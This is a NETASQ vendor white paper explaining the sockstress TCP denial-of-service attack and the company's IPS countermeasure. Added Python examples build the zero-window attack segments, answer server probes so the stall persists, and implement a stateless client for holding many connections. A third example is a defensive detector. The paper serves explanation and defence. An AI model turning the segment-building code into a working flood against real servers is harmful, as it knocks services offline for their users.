Sockstress

On September 8, 2009, Outpost24 published a TCP-based software tool suite. This suite, called “sockstress”, combines several attacks that abuse the protocol with the aim of making a server unreachable. This type of attack is commonly known as a “denial of service”. The attacks in the sockstress suite may prove disastrous because they are extremely difficult to counter.

Denial of service
A denial of service (DoS) attack is launched with the aim of affecting the availability of a network service; it succeeds when users can no longer reach the service. The main targets of these attacks are public sites, and e-commerce or online betting sites in particular. For the latter, denial of service attacks usually go hand in hand with other fraudulent practices such as blackmail.
DoS attacks fall under 2 main types:
. Denial of service by flooding the network link (exhausting bandwidth)
. Denial of service by flooding server resources (processor and/or memory)
Corporate servers generally have more resources than their attackers do. A successful DoS therefore relies either on several attack sources (in this case we speak of a distributed denial of service, or DDoS) or on the exploitation of a software weakness that lets a single attacker consume all of the server’s resources (software DoS).

The sockstress tool exploits several TCP mechanisms in order to exhaust the memory of any TCP server that is publicly reachable.


A few technical points
TCP is the cornerstone of internet and inter-company communications: it provides reliable, ordered delivery of data and carries most application protocols – web, mail, FTP, instant messaging, etc.

The sockstress tool abuses a TCP feature called the “TCP window”. This mechanism optimizes the exchange of data between a client and a server.

Once the introductions (the TCP handshake) have been made, the client and the server exchange data (DATA) and acknowledgements of receipt (ACK). The window mechanism avoids having to acknowledge every segment individually: in each packet, the client and the server each announce how many bytes they can still receive before an acknowledgement has to be sent. This value is called the “TCP window size”. A window of zero tells the peer to stop sending until a larger window is advertised.

The sockstress attack abuses this window mechanism to drain the server’s resources.


Sockstress attack on the TCP window
The sockstress attack drains the memory of a TCP server very quickly by shrinking the client’s advertised TCP window to zero. An attack launched by the sockstress tool proceeds as follows:
1. Initialization of the connection between the client and the server (TCP handshake)
2. The client sends 2 consecutive queries to the server under attack:
a. An application query that requires a response from the server
b. A TCP packet telling the server that the client cannot receive data for the moment (TCP window equal to zero)
3. The client keeps the TCP connection open and keeps the window size at zero.

When the server receives the application query, it prepares the response data. As soon as the client’s window drops to zero, the server must suspend sending and keep the response in its send buffer; it periodically probes the client to see whether the window has reopened, and the client answers each probe with another zero-window acknowledgement. The buffered data and the connection state stay in memory for as long as the connection is held open. Once the server has used up all the memory available for such buffered data, it can no longer respond to legitimate requests.
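The sequence described above, built as TCP segments in memory, as an added example that is not part of the paper and not the sockstress tool’s own code. The addresses, ports, sequence numbers and HTTP request are made up; the example only constructs, checksums and parses the segments (sending them would require a raw socket and a completed handshake), so it runs anywhere.

```python
"""Build the segments of the sockstress zero-window sequence, in memory only.

Added example; this is not the sockstress tool's code nor anything from the
paper. Addresses, ports and sequence numbers are made up. After a completed
handshake the client sends (a) a request that forces a reply and (b) a pure
ACK advertising a zero receive window, then answers every zero-window probe
with another zero-window ACK so the server keeps the reply buffered.
"""
import struct
from ipaddress import IPv4Address

FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10
# sport, dport, seq, ack, data offset/reserved, flags, window, checksum, urgent pointer
HDR = "!HHIIBBHHH"


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum of 16-bit words (odd length is zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _pseudo_header(src_ip, dst_ip, tcp_length):
    # IPv4 pseudo-header covered by the TCP checksum: addresses, zero, protocol 6, TCP length
    return struct.pack("!4s4sBBH", IPv4Address(src_ip).packed,
                       IPv4Address(dst_ip).packed, 0, 6, tcp_length)


def build_segment(src_ip, dst_ip, sport, dport, seq, ack, flags, window, payload=b""):
    """TCP header (20 bytes, no options) plus payload, with a correct checksum."""
    hdr = struct.pack(HDR, sport, dport, seq & 0xFFFFFFFF, ack & 0xFFFFFFFF,
                      5 << 4, flags, window, 0, 0)
    csum = inet_checksum(_pseudo_header(src_ip, dst_ip, len(hdr) + len(payload)) + hdr + payload)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def parse_header(segment):
    """Decode the fixed header fields and return the payload after the options."""
    f = struct.unpack(HDR, segment[:20])
    offset = f[4] >> 4
    return {"sport": f[0], "dport": f[1], "seq": f[2], "ack": f[3], "offset": offset,
            "flags": f[5], "window": f[6], "checksum": f[7], "payload": segment[offset * 4:]}


def checksum_ok(src_ip, dst_ip, segment) -> bool:
    # summing a correct segment together with its own checksum field folds to zero
    return inet_checksum(_pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


def sockstress_sequence(src_ip, dst_ip, sport, dport, client_isn, server_isn, request):
    """Segments (a) and (b) the client sends once the handshake is complete."""
    seq, ack = client_isn + 1, server_isn + 1          # each SYN consumed one sequence number
    a = build_segment(src_ip, dst_ip, sport, dport, seq, ack, PSH | ACK, 64, request)
    b = build_segment(src_ip, dst_ip, sport, dport, seq + len(request), ack, ACK, 0)
    return a, b


def answer_probe(src_ip, dst_ip, sport, dport, our_seq, probe_hdr):
    """Reply to a server zero-window probe: accept nothing (ack the probe's own
    sequence number) and keep advertising window 0 so the send buffer stays full."""
    return build_segment(src_ip, dst_ip, sport, dport, our_seq, probe_hdr["seq"], ACK, 0)


if __name__ == "__main__":
    a, b = sockstress_sequence("10.0.0.2", "192.0.2.10", 40000, 80, 1000, 5000,
                               b"GET / HTTP/1.0\r\n\r\n")
    for name, seg in (("request", a), ("zero-window ACK", b)):
        h = parse_header(seg)
        print(name, "flags=0x%02x window=%d checksum_ok=%s" %
              (h["flags"], h["window"], checksum_ok("10.0.0.2", "192.0.2.10", seg)))
```

The server’s persist probe carries one byte at the sequence number the client last acknowledged; answering it with the same acknowledgement number and window 0 is exactly what keeps the connection in the stalled state described in step 3.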

Sockstress makes this attack trivial to carry out: the attacker only has to specify the target server and the number of connections to hold open simultaneously.

The attack is so effective because very few simultaneous connections are needed to exhaust even the most powerful server on the market.


Sockstress attack on the RENO algorithm
Sockstress provides many variants and optimizations that make the attacks more effective and bypass countermeasures that may have been deployed. The window size announced to the server may range from zero to a few bytes without the attack losing its effectiveness.

Sockstress can also make the server burn resources by sending several identical acknowledgement packets (duplicate ACKs) in succession. Duplicate ACKs trigger the fast retransmit and fast recovery behaviour of the TCP Reno congestion control algorithm, which changes how the server transmits and mobilizes a large amount of resources, generally ending in a complete denial of service on the attacked server.

Lastly, sockstress optimizations minimize the client’s own consumption of resources. They use a mechanism that closely resembles “SYN cookies”: by encoding key information about the current connection into a TCP option, the sockstress client avoids keeping the full state of every connection in memory and can therefore maintain a far greater number of simultaneous connections.
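One way to implement the stateless client described above, as an added example that is not part of the paper and not the sockstress tool’s own code. Where the paper says sockstress stores the information in a TCP option, this example puts it where classic SYN cookies put it, in the initial sequence number: the ISN is a keyed hash of the 4-tuple, a coarse time slot and a small “mode” value, so an incoming SYN/ACK can be validated by recomputation rather than by a lookup in a table of open connections. The key, addresses and ports are made up.

```python
"""Keep per-connection client state in the sequence number, the way SYN cookies do.

Added example, not code from the paper or from sockstress itself. The key,
addresses and ports are constructed for the example. The client derives its
initial sequence number (ISN) from a keyed hash of the 4-tuple, a time slot and
a "mode" value; on SYN/ACK it recomputes the hash instead of looking the
connection up, so many in-flight connections cost the client no memory.
"""
import hashlib
import hmac
import struct
import time
from ipaddress import IPv4Address

SECRET_KEY = b"constructed-example-key"   # assumption: a fresh random key per run in practice
MODE_BITS = 8                              # low bits of the ISN carry the mode in clear
MAC_MASK = (1 << (32 - MODE_BITS)) - 1     # the remaining 24 bits hold the MAC
SLOT_SECONDS = 64                          # slot granularity; the check also accepts the previous slot


def current_slot(now=None) -> int:
    return int((time.time() if now is None else now) // SLOT_SECONDS)


def _mac(src_ip, sport, dst_ip, dport, slot, mode, key) -> int:
    """24-bit keyed MAC binding the 4-tuple, the time slot and the mode value."""
    msg = (IPv4Address(src_ip).packed + IPv4Address(dst_ip).packed
           + struct.pack("!HHIB", sport, dport, slot, mode))
    return int.from_bytes(hmac.new(key, msg, hashlib.sha256).digest()[:3], "big") & MAC_MASK


def make_isn(src_ip, sport, dst_ip, dport, mode, slot=None, key=SECRET_KEY) -> int:
    """ISN to put in the client's SYN: MAC in the high 24 bits, mode in the low 8."""
    if not 0 <= mode < (1 << MODE_BITS):
        raise ValueError("mode does not fit in %d bits" % MODE_BITS)
    slot = current_slot() if slot is None else slot
    return (_mac(src_ip, sport, dst_ip, dport, slot, mode, key) << MODE_BITS) | mode


def check_synack(src_ip, sport, dst_ip, dport, ack_number, slot=None, key=SECRET_KEY):
    """Validate a SYN/ACK for our (src_ip, sport) -> (dst_ip, dport) connection.

    Returns the mode encoded in the ISN if the peer acknowledges an ISN this
    client would have generated in the current or previous slot, else None.
    The mode is read from the low bits, then authenticated by recomputing the
    MAC over it, so a tampered or guessed ISN fails the check.
    """
    isn = (ack_number - 1) & 0xFFFFFFFF     # the peer must acknowledge ISN + 1
    mode = isn & ((1 << MODE_BITS) - 1)
    slot = current_slot() if slot is None else slot
    for s in (slot, slot - 1):
        if isn >> MODE_BITS == _mac(src_ip, sport, dst_ip, dport, s, mode, key):
            return mode
    return None


def on_synack(reply_src_ip, reply_sport, reply_dst_ip, reply_dport, ack_number, slot=None):
    """Handle an incoming SYN/ACK: its source is the server, its destination is us."""
    return check_synack(reply_dst_ip, reply_dport, reply_src_ip, reply_sport, ack_number, slot)


if __name__ == "__main__":
    isn = make_isn("10.0.0.2", 40000, "192.0.2.10", 80, mode=3)
    print("SYN isn=%08x" % isn)
    print("SYN/ACK accepted, mode =", on_synack("192.0.2.10", 80, "10.0.0.2", 40000, isn + 1))
    print("forged SYN/ACK, mode =", on_synack("192.0.2.10", 80, "10.0.0.2", 40000, isn + 7))
```

A 24-bit MAC means an unsolicited or spoofed SYN/ACK has roughly one chance in 16 million of being accepted per slot, and the slot counter stops an old observed ISN from being replayed indefinitely.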

3 major protocol attacks within 1 year
The publication of sockstress is the third major protocol attack within a year, after the discovery of the “Kaminsky” DNS vulnerability and the “nkiller2” attack on web servers. This outbreak of protocol attacks is a real threat for enterprises. Indeed, unlike application attacks, which only affect a limited number of companies, protocol attacks are an immediate threat not only to every company network but also to the stability of the internet itself.

The team that developed the sockstress tool assessed the scale of the risk and informed the various players in the networking and security domain before distributing the tool publicly.

Nonetheless, despite this responsible disclosure, antivirus, firewall and IPS (intrusion prevention system) vendors are unable to produce effective protection signatures.

The Achilles heel of security solutions
Antivirus and IPS products on the market block attacks by comparing the data submitted to them against one or more databases of known attacks. Conventionally, antivirus products concentrate on scanning files while IPS products scan network traffic in real time. In both cases, however, an attack is detected only when it matches exactly the information held in the product’s database.

For sockstress, no such snapshot of the attack can be taken: the attack segments conform to the TCP standard (valid use of the protocol) and carry no specific data. An antivirus or IPS signature therefore cannot tell fraudulent use of the TCP window apart from normal behavior. Worse, in many cases the security product itself is vulnerable to sockstress: the operating systems these products run on use the same TCP implementations and react in the same way as a vulnerable server.

For many companies, the only solution is therefore to ensure that every one of their network servers is protected against this attack. In most cases, the service will need to be updated.


NETASQ’s protection
The NETASQ intrusion prevention system performs full stateful inspection of TCP. Each TCP connection is tracked by the NETASQ IPS, which checks that the protocol is used validly and detects abnormal behavior. To block the sockstress attack effectively, the NETASQ IPS detects variations in the advertised TCP window size and adapts its behavior automatically so as to end the attack without blocking legitimate connections.

Likewise, the NETASQ IPS counters attempts to trigger the TCP Reno attack: offending packets are blocked automatically, so the server never enters this algorithm, which consumes a great deal of resources.
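What behavioural tracking of this kind looks like in practice, as an added example that is not NETASQ’s IPS code and not part of the paper: it scores each TCP connection on the two behaviours the paper describes, a receive window held at zero long after the client sent a request, and bursts of duplicate ACKs, then aggregates the hits per source address. The packet-summary log format and every address, port and timestamp in it are constructed for this example.

```python
"""Behavioural detection of sockstress-style TCP abuse from a packet summary log.

Added example; not NETASQ's IPS code nor anything from the paper. The log
format and all addresses, ports and timestamps are constructed. Two behaviours
are scored per connection: an advertised window held at zero for a long time
after the client sent request data, and bursts of identical pure ACKs.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+) (?P<src>[\d.]+):(?P<sport>\d+) > (?P<dst>[\d.]+):(?P<dport>\d+) "
    r"flags=(?P<flags>[A-Z]+) ack=(?P<ack>\d+) win=(?P<win>\d+) len=(?P<len>\d+)$"
)

# Constructed sample: two stalled connections from 203.0.113.7, a legitimate
# client (198.51.100.5) whose window dips to 0 briefly, and a duplicate-ACK burst.
SAMPLE_LOG = """\
0.000 203.0.113.7:40001 > 192.0.2.10:80 flags=PA ack=1 win=64 len=72
0.001 203.0.113.7:40001 > 192.0.2.10:80 flags=A ack=1 win=0 len=0
5.002 203.0.113.7:40001 > 192.0.2.10:80 flags=A ack=1 win=0 len=0
15.004 203.0.113.7:40001 > 192.0.2.10:80 flags=A ack=1 win=0 len=0
35.008 203.0.113.7:40001 > 192.0.2.10:80 flags=A ack=1 win=0 len=0
0.010 203.0.113.7:40002 > 192.0.2.10:80 flags=PA ack=1 win=64 len=72
0.011 203.0.113.7:40002 > 192.0.2.10:80 flags=A ack=1 win=0 len=0
35.020 203.0.113.7:40002 > 192.0.2.10:80 flags=A ack=1 win=0 len=0
1.000 198.51.100.5:51000 > 192.0.2.10:80 flags=PA ack=1 win=65535 len=90
1.050 198.51.100.5:51000 > 192.0.2.10:80 flags=A ack=1461 win=0 len=0
1.250 198.51.100.5:51000 > 192.0.2.10:80 flags=A ack=2921 win=65535 len=0
2.000 203.0.113.9:40500 > 192.0.2.10:80 flags=A ack=4381 win=65535 len=0
2.010 203.0.113.9:40500 > 192.0.2.10:80 flags=A ack=4381 win=65535 len=0
2.020 203.0.113.9:40500 > 192.0.2.10:80 flags=A ack=4381 win=65535 len=0
2.030 203.0.113.9:40500 > 192.0.2.10:80 flags=A ack=4381 win=65535 len=0
2.040 203.0.113.9:40500 > 192.0.2.10:80 flags=A ack=4381 win=65535 len=0
""".strip().splitlines()


def parse_log(lines):
    """Parse summary lines into records keyed by the connection 4-tuple, in time order."""
    records = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # lines that do not fit the format are ignored
        d = m.groupdict()
        records.append({"ts": float(d["ts"]),
                        "conn": (d["src"], int(d["sport"]), d["dst"], int(d["dport"])),
                        "flags": d["flags"], "ack": int(d["ack"]),
                        "win": int(d["win"]), "len": int(d["len"])})
    return sorted(records, key=lambda r: r["ts"])


def zero_window_holds(records, min_hold=10.0):
    """Connections that advertised window 0 continuously for >= min_hold seconds
    after sending request data. A legitimate stall reopens the window quickly."""
    state = {}  # conn -> [request_seen, zero_since, longest_hold]
    for r in records:
        st = state.setdefault(r["conn"], [False, None, 0.0])
        if r["len"] > 0:
            st[0] = True
        if r["win"] == 0:
            if st[1] is None:
                st[1] = r["ts"]
            st[2] = max(st[2], r["ts"] - st[1])
        else:
            st[1] = None  # window reopened: the zero-window run ends
    return {c: round(st[2], 3) for c, st in state.items() if st[0] and st[2] >= min_hold}


def dup_ack_bursts(records, threshold=4, within=1.0):
    """Connections repeating the same pure ACK (no data, same ack number) at least
    `threshold` times within `within` seconds: the duplicate-ACK pattern that
    pushes the peer into Reno fast retransmit / fast recovery."""
    runs, flagged = {}, {}  # conn -> [ack, timestamps in the current run]
    for r in records:
        if "A" not in r["flags"] or r["len"] != 0:
            continue
        run = runs.get(r["conn"])
        if run is None or run[0] != r["ack"]:
            runs[r["conn"]] = run = [r["ack"], []]
        run[1].append(r["ts"])
        run[1] = [t for t in run[1] if r["ts"] - t <= within]  # sliding time window
        if len(run[1]) >= threshold:
            flagged[r["conn"]] = max(flagged.get(r["conn"], 0), len(run[1]))
    return flagged


def suspicious_sources(records):
    """Number of flagged connections per source address (sockstress holds many)."""
    per_src = defaultdict(set)
    for conn in list(zero_window_holds(records)) + list(dup_ack_bursts(records)):
        per_src[conn[0]].add(conn[1])
    return {src: len(ports) for src, ports in per_src.items()}


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for conn, hold in zero_window_holds(recs).items():
        print("zero window held %.3fs on %s:%d -> %s:%d" % ((hold,) + conn))
    for conn, n in dup_ack_bursts(recs).items():
        print("%d duplicate ACKs in a burst on %s:%d -> %s:%d" % ((n,) + conn))
    print("suspicious sources:", suspicious_sources(recs))
```

The thresholds are the tuning knobs an operator would expose: a zero window that persists for tens of seconds after a request is the signature-less signal the paper says a content signature cannot capture, while the per-source aggregation separates one slow client from a tool holding hundreds of stalled connections.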


NETASQ © Copyright 2011. All rights reserved.